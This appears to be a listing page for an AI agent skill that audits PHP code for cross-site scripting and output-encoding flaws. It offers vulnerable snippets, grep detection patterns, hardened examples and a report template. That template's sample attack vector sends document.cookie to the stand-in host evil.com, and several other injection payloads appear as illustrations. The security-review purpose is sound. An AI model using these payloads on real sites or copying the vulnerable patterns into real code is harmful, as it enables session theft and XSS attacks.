check-output-encoding
Analyzes PHP code for output encoding issues. Detects XSS vulnerabilities, missing HTML encoding, raw output, template injection risks.
Best use case
check-output-encoding is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Teams using check-output-encoding should expect more consistent output, faster repeated execution, and less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in `.claude/skills/check-output-encoding/SKILL.md` inside your project
- Restart your AI agent; it will auto-discover the skill
Frequently Asked Questions
What does this skill do?
Analyzes PHP code for output encoding issues. Detects XSS vulnerabilities, missing HTML encoding, raw output, template injection risks.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Output Encoding Security Check
Analyze PHP code for XSS and output encoding vulnerabilities.
## Detection Patterns
### 1. Missing HTML Encoding
```php
// CRITICAL: Direct echo of request input
echo $_GET['name'];
// CRITICAL: Stored data is user input too (stored XSS)
echo $user->getBio();
// CRITICAL: In an HTML attribute (a quote ends the value, then new attributes follow)
<input value="<?= $value ?>">
// CRITICAL: In an href (attribute context plus URL context; HTML encoding alone does not stop a javascript: scheme)
<a href="<?= $url ?>">
// CRITICAL: In a JavaScript string (a quote ends the literal, </script> ends the element)
<script>var name = "<?= $name ?>";</script>
```
### 2. Raw Template Output
```php
// CRITICAL: Blade raw output
{!! $userContent !!}
{!! $request->input('message') !!}
// CRITICAL: Twig raw filter
{{ content|raw }}
{% autoescape false %}{{ content }}{% endautoescape %}
// VULNERABLE: PHP in templates
<?php echo $title; ?>
```
### 3. URL Encoding Issues
```php
// VULNERABLE: Building a javascript: URL from input
$url = "javascript:" . $_GET['code'];
// VULNERABLE: User-controlled URL in href; HTML encoding would not remove the
// javascript: scheme, so the scheme itself must be validated before output
<a href="<?= $url ?>">Click</a>
// VULNERABLE: User content inside a data: URL
<img src="data:image/svg+xml,<?= $content ?>">
// VULNERABLE: Query parameter without percent-encoding ("&x=y" adds a parameter,
// a quote breaks out of the attribute)
<a href="/search?q=<?= $query ?>">
```
### 4. JSON/JavaScript Context
```php
// VULNERABLE: json_encode() without the JSON_HEX_* flags leaves < > & ' " as-is.
// The default escaping of "/" stops a literal </script>, but nothing else is
// neutralised, so the value is unsafe in an attribute and fragile in a script element
<script>
var config = <?= json_encode($userConfig) ?>;
</script>
// CRITICAL: String in JS without escaping
<script>
var name = "<?= $name ?>"; // XSS via ";</script><script>alert(1)
</script>
// CORRECT: hex-escape the HTML-significant characters so the JSON literal can
// neither close the <script> element nor break out of an attribute
<script>
var config = <?= json_encode($config, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP) ?>;
</script>
```
### 5. CSS Context Injection
```php
// VULNERABLE: User input in style
<div style="background: <?= $color ?>">
// VULNERABLE: CSS injection
<style>
.user { color: <?= $userColor ?>; }
</style>
// ATTACK: expression(alert(1)) in old IE, url("javascript:") in legacy browsers;
// in current browsers injected CSS still exfiltrates data (attribute selectors
// plus url()) or redresses the UI, so the finding stands
```
### 6. Header Injection
```php
// VULNERABLE: Open redirect. header() has refused values containing a newline
// since PHP 5.1.2, so the realistic finding is an attacker-chosen destination,
// not CRLF; validate the target instead of relying on that check
header("Location: " . $_GET['redirect']);
// NOTE: setcookie() URL-encodes the value and setrawcookie() rejects control
// characters, so cookie values are not a CRLF vector on supported PHP versions
setcookie('session', $value);
// VULNERABLE: Email header injection. PHP replaces control characters in $to and
// $subject, but a user value in $additional_headers is forwarded to the MTA, so
// the user can append "\r\nBcc: ..." and turn the form into a spam relay
mail($to, $subject, $body, "From: " . $_POST['email']);
```
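The two findings above, each paired with a hardened version, as an added example that is not part of the skill. The function names `safe_redirect_target`, `from_header`, `redirect_to` and `send_contact_mail` are assumptions for this example; `header()`, `mail()`, `filter_var()` and `preg_match()` are standard PHP. The attacker inputs at the bottom are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not part of the skill. Function names are assumptions.

// Open redirect. header() already refuses a value with a newline, so the control that
// matters is restricting the destination. Accept only root-relative paths on this site.
function safe_redirect_target(string $target, string $fallback = '/'): string
{
    // Reject control characters and spaces: browsers strip tabs and newlines while
    // parsing a URL, which defeats a naive "starts with /" check.
    if (preg_match('/[\x00-\x20\x7f]/', $target) === 1) {
        return $fallback;
    }
    // Exactly one leading slash. "//evil.example" and "/\evil.example" are treated as
    // scheme-relative URLs by browsers, so a second slash or a backslash is rejected.
    if (preg_match('#\A/(?![/\\\\])#', $target) !== 1) {
        return $fallback;
    }
    return $target;
}

// Mail header injection. PHP replaces control characters in $to and $subject with
// spaces, but a value placed in $additional_headers reaches the MTA unchanged, so
// "From: " . $_POST['email'] lets a user append "\r\nBcc: ...". Validate the value as
// a single address and build the header only from a value that passed.
function from_header(string $email): ?string
{
    $email = trim($email);
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return 'From: ' . $email;
}

// Hardened versions of the two vulnerable calls.
function redirect_to(string $requested): void
{
    header('Location: ' . safe_redirect_target($requested), true, 302);
}

function send_contact_mail(string $replyTo, string $body): bool
{
    $from = from_header($replyTo);
    if ($from === null) {
        return false; // refuse to send rather than send with a forged header
    }
    return mail('support@example.com', 'Contact form', $body, $from);
}

// Constructed attacker inputs, run through the validators only (no side effects).
$redirects = ['/account', '//evil.example/phish', "/\\evil.example", "/ok\r\nSet-Cookie: a=b", 'https://evil.example'];
foreach ($redirects as $r) {
    printf("redirect %-30s -> %s\n", json_encode($r), safe_redirect_target($r));
}
$emails = ['user@example.com', "user@example.com\r\nBcc: all@victim.example", 'not an address'];
foreach ($emails as $e) {
    printf("from %-50s -> %s\n", json_encode($e), from_header($e) ?? '(rejected)');
}
```

Only `/account` and `user@example.com` survive; everything else falls back to `/` or is rejected. Allowlisting a root-relative path is stricter than checking the host, which is the usual way `//evil.example` and backslash variants slip past a redirect filter.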
### 7. Content-Type Mismatch
```php
// VULNERABLE: PHP's default Content-Type is text/html, so this body renders as a
// page when opened directly, and json_encode() leaves "<" unescaped; a string
// value such as "<img src=x onerror=alert(1)>" then executes
echo json_encode($data);
// CORRECT: declare the type, forbid sniffing, and hex-escape HTML characters anyway
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');
echo json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP);
```
### 8. SVG/XML Injection
```php
// VULNERABLE: User input in an SVG template (plain PHP templates have no auto-escaping)
<svg><text><?= $name ?></text></svg>
// VULNERABLE: XML built by string interpolation
$xml = "<user><name>$name</name></user>";
// ATTACK: close the current element and open a new one, e.g.
//   </text><script>alert(1)</script><text>    (SVG served inline or as a document is scriptable)
//   </name><role>admin</role><name>           (structure injection into the XML)
// FIX: htmlspecialchars($name, ENT_QUOTES | ENT_XML1, 'UTF-8') in both cases
```
## Grep Patterns
```bash
# Direct echo of variables
Grep: "echo\s+\\\$_(GET|POST|REQUEST)" --glob "**/*.php"
Grep: 'echo\s+\$\w+\s*;' --glob "**/*.php"
# Blade raw output
Grep: "\{!!\s*\\\$" --glob "**/*.blade.php"
# Twig raw filter
Grep: "\|raw\s*\}" --glob "**/*.twig"
# JavaScript context
Grep: '<script[^>]*>.*\$\w+' --glob "**/*.php"
# In HTML attributes
Grep: '(href|src|value|style)=["'\''].*<\?=' --glob "**/*.php"
```
## Severity Classification
| Pattern | Severity |
|---------|----------|
| Direct echo of user input | 🔴 Critical |
| JavaScript context injection | 🔴 Critical |
| Raw template output | 🔴 Critical |
| Header injection | 🟠 Major |
| Missing JSON content-type | 🟡 Minor |
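The Grep patterns and the severity table above, as an added example that is not part of the skill: a small PHP scanner applies the skill's own regexes line by line to a constructed source file and reports each hit in the skill's output format. The `RULES` table, `scan_source()` and the sample file contents are assumptions constructed for this example.

```php
<?php
declare(strict_types=1);

// Added example, not part of the skill. Rules are [name, PCRE, severity]; the
// patterns are the skill's Grep patterns written as PHP single-quoted strings.
const RULES = [
    ['Direct echo of user input',    '/echo\s+\$_(GET|POST|REQUEST)\b/',          '🔴 Critical'],
    ['Direct echo of variable',      '/echo\s+\$\w+\s*;/',                         '🔴 Critical'],
    ['Blade raw output',             '/\{!!\s*\$/',                                '🔴 Critical'],
    ['Twig raw filter',              '/\|raw\s*\}/',                               '🔴 Critical'],
    ['JavaScript context injection', '/<script[^>]*>.*\$\w+/',                     '🔴 Critical'],
    ['Unencoded attribute value',    '/(href|src|value|style)=["\'][^"\']*<\?=/',  '🔴 Critical'],
];

/**
 * Scan one file's contents. Returns a list of findings, each with file, 1-based
 * line number, rule name, severity and the offending line.
 */
function scan_source(string $path, string $source): array
{
    $findings = [];
    foreach (explode("\n", $source) as $i => $line) {
        foreach (RULES as [$name, $pattern, $severity]) {
            if (preg_match($pattern, $line) === 1) {
                $findings[] = [
                    'file'     => $path,
                    'line'     => $i + 1,
                    'rule'     => $name,
                    'severity' => $severity,
                    'code'     => trim($line),
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample mixing safe and unsafe lines; the htmlspecialchars() line
// must not be reported.
$sample = <<<'PHP'
<?php
echo $_GET['name'];
echo htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo $title;
?>
<input value="<?= $value ?>">
<script>var name = "<?= $name ?>";</script>
PHP;

foreach (scan_source('profile.php', $sample) as $f) {
    printf(
        "### XSS Vulnerability: %s\n**Severity:** %s\n**Location:** `%s:%d`\n**Code:** `%s`\n\n",
        $f['rule'], $f['severity'], $f['file'], $f['line'], $f['code']
    );
}
```

Four findings come back (lines 2, 4, 6 and 7 of the sample). Line-based regexes cannot tell a tainted `$title` from one that was encoded earlier, and they miss patterns that span lines, which is why the skill treats these hits as candidates for review rather than confirmed vulnerabilities.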
## Encoding Functions
### HTML Context
```php
// PHP
echo htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// Blade (default)
{{ $value }}
// Twig (default)
{{ value }}
```
### URL Context
```php
// Query component: percent-encode; the result contains only unreserved
// characters, "%" and "+", so it is also safe inside the attribute
<a href="/search?q=<?= urlencode($query) ?>">
// Whole URL: HTML-encode for the attribute, but encoding cannot remove a
// javascript: or data: scheme; allowlist the scheme (http, https) or require a
// root-relative path before output
<a href="<?= htmlspecialchars($url, ENT_QUOTES) ?>">
```
### JavaScript Context
```php
<script>
var data = <?= json_encode($data, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP) ?>;
</script>
```
### CSS Context
```php
// Whitelist approach (strict comparison, so "0" or true cannot match loosely)
$allowedColors = ['red', 'blue', 'green'];
$color = in_array($input, $allowedColors, true) ? $input : 'black';
```
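Sections 1, 3, 4 and 5 above describe the same rule from the attacker's side, and this section lists the encoder for each context. The following added example, which is not part of the skill, puts one encoder per context next to each other and runs a single constructed payload through all of them so the differences are visible. The helper names (`e_html`, `e_attr`, `e_js`, `e_url_param`, `safe_href`, `e_css_color`) are assumptions for this example; the PHP functions they wrap are standard. Requires PHP 8.0+.

```php
<?php
declare(strict_types=1);

// Added example, not part of the skill. Helper names are assumptions.

const ENC_FLAGS = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;

// HTML body text. ENT_QUOTES encodes both quote characters; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning "" (the pre-8.1 default), which would silently
// blank a field.
function e_html(string $s): string
{
    return htmlspecialchars($s, ENC_FLAGS, 'UTF-8');
}

// Quoted attribute value: same encoder, named for intent. Only valid inside a
// double- or single-quoted attribute; unquoted attributes have no safe encoder.
function e_attr(string $s): string
{
    return e_html($s);
}

// JavaScript value: a JSON literal with < > & ' " hex-escaped, so it can neither end
// the <script> element nor break out of an attribute that holds inline JS.
function e_js(mixed $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// One query-string component: percent-encoding. The output contains only unreserved
// characters, "%" and "+", so it is also safe inside the surrounding attribute.
function e_url_param(string $s): string
{
    return urlencode($s);
}

// A whole URL supplied by the user: encoding cannot remove a javascript: scheme, so
// validate first. Control characters and spaces are rejected because browsers strip
// tabs and newlines while parsing, which defeats a naive prefix check.
function safe_href(string $url): string
{
    if (preg_match('/[\x00-\x20\x7f]/', $url) === 1) {
        return '#';
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $rootRelative = $scheme === '' && str_starts_with($url, '/') && !str_starts_with($url, '//');
    $allowedScheme = in_array($scheme, ['http', 'https', 'mailto'], true);
    return e_attr($rootRelative || $allowedScheme ? $url : '#');
}

// CSS: no general escaper keeps an arbitrary value meaningful, so accept one grammar
// (here a hex colour) and fall back to a constant for anything else.
function e_css_color(string $s): string
{
    return preg_match('/\A#[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?\z/', $s) === 1 ? $s : '#000';
}

// Constructed payload that attacks every context at once.
$payload = '"><script>alert(1)</script><a href="javascript:alert(2)';

echo '<p>', e_html($payload), '</p>', PHP_EOL;
echo '<input value="', e_attr($payload), '">', PHP_EOL;
echo '<script>var name = ', e_js($payload), ';</script>', PHP_EOL;
echo '<a href="/search?q=', e_url_param($payload), '">', PHP_EOL;
echo '<a href="', safe_href('javascript:alert(3)'), '">', PHP_EOL;
echo '<a href="', safe_href('/account?tab=1'), '">', PHP_EOL;
echo '<div style="color: ', e_css_color('red; background: url(//evil.example)'), '">', PHP_EOL;
```

The point of the last three lines is that two of the contexts are not fixed by encoding at all: `safe_href` keeps `/account?tab=1` but replaces the `javascript:` URL with `#`, and `e_css_color` discards the injected declaration entirely. Everything else is encoded once, for exactly the context it lands in.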
## Output Format
````markdown
### XSS Vulnerability: [Description]
**Severity:** 🔴 Critical
**Location:** `file.php:line`
**CWE:** CWE-79 (Cross-site Scripting)
**Issue:**
User input is output without proper encoding.
**Attack Vector:**
Attacker can inject: `<script>document.location='https://evil.com/?c='+document.cookie</script>`
**Code:**
```php
// Vulnerable code
```
**Fix:**
```php
// With proper encoding
```
````
## When This Is Acceptable
- **API-only projects** — JSON APIs don't need HTML encoding, provided the response is sent with `Content-Type: application/json` (and `X-Content-Type-Options: nosniff`) and the consuming front end does not insert the values into the DOM unescaped
- **Internal admin tools** — Tools used only by authenticated admins, where no lower-privileged user can supply the data they see; if ordinary users can, stored XSS against an admin is a privilege escalation, not an acceptable finding
- **Template engines** — Twig/Blade auto-escape by default; raw output requires explicit `|raw` or `{!! !!}`
### False Positive Indicators
- Response has `Content-Type: application/json` header
- Project has no HTML templates (pure API)
- Template engine auto-escaping is enabled (Twig default)
Related Skills
explain-output-template
Output format templates for all 5 explanation modes — quick (compact), deep (full analysis with diagrams), onboarding (project guide), business (non-technical), qa (interactive Q&A).
create-health-check
Generates Health Check pattern for PHP 8.4. Creates application-level health endpoints with component checkers (Database, Redis, RabbitMQ), status aggregation, and RFC-compliant JSON response. Includes unit tests.
create-docker-healthcheck
Generates Docker health check scripts for PHP services. Creates PHP-FPM, Nginx, and custom endpoint health checks.
check-xxe
Analyzes PHP code for XML External Entity vulnerabilities. Detects unsafe XML parsers, missing entity protection, LIBXML flags issues, XSLT attacks.
check-version-consistency
Audits version consistency across project files. Checks composer.json, README, CHANGELOG, docs, and configuration files for version number synchronization.
check-type-juggling
Detects PHP type juggling vulnerabilities. Identifies loose comparison with user input, in_array without strict mode, switch statement type coercion, and hash comparison bypasses.
check-timeout-strategy
Audits timeout configuration across HTTP clients, database connections, queue consumers, cache operations, and external service calls. Detects missing or misconfigured timeouts.
check-test-quality
Analyzes PHP test code quality. Checks test structure, assertion quality, test isolation, naming conventions, AAA pattern adherence.
check-ssrf
Analyzes PHP code for SSRF vulnerabilities. Detects unvalidated URLs, internal network access, DNS rebinding, cloud metadata access, URL parsing bypass attempts.
check-sql-injection
Analyzes PHP code for SQL injection vulnerabilities. Detects query concatenation, ORM misuse, raw queries, dynamic identifiers, prepared statement bypasses.
check-serialization
Analyzes PHP code for serialization overhead. Detects inefficient JSON encoding, large object hydration, missing JsonSerializable, circular reference issues.
check-sensitive-data
Analyzes PHP code for sensitive data exposure. Detects plaintext secrets, exposed credentials, PII in logs, insecure storage, hardcoded keys.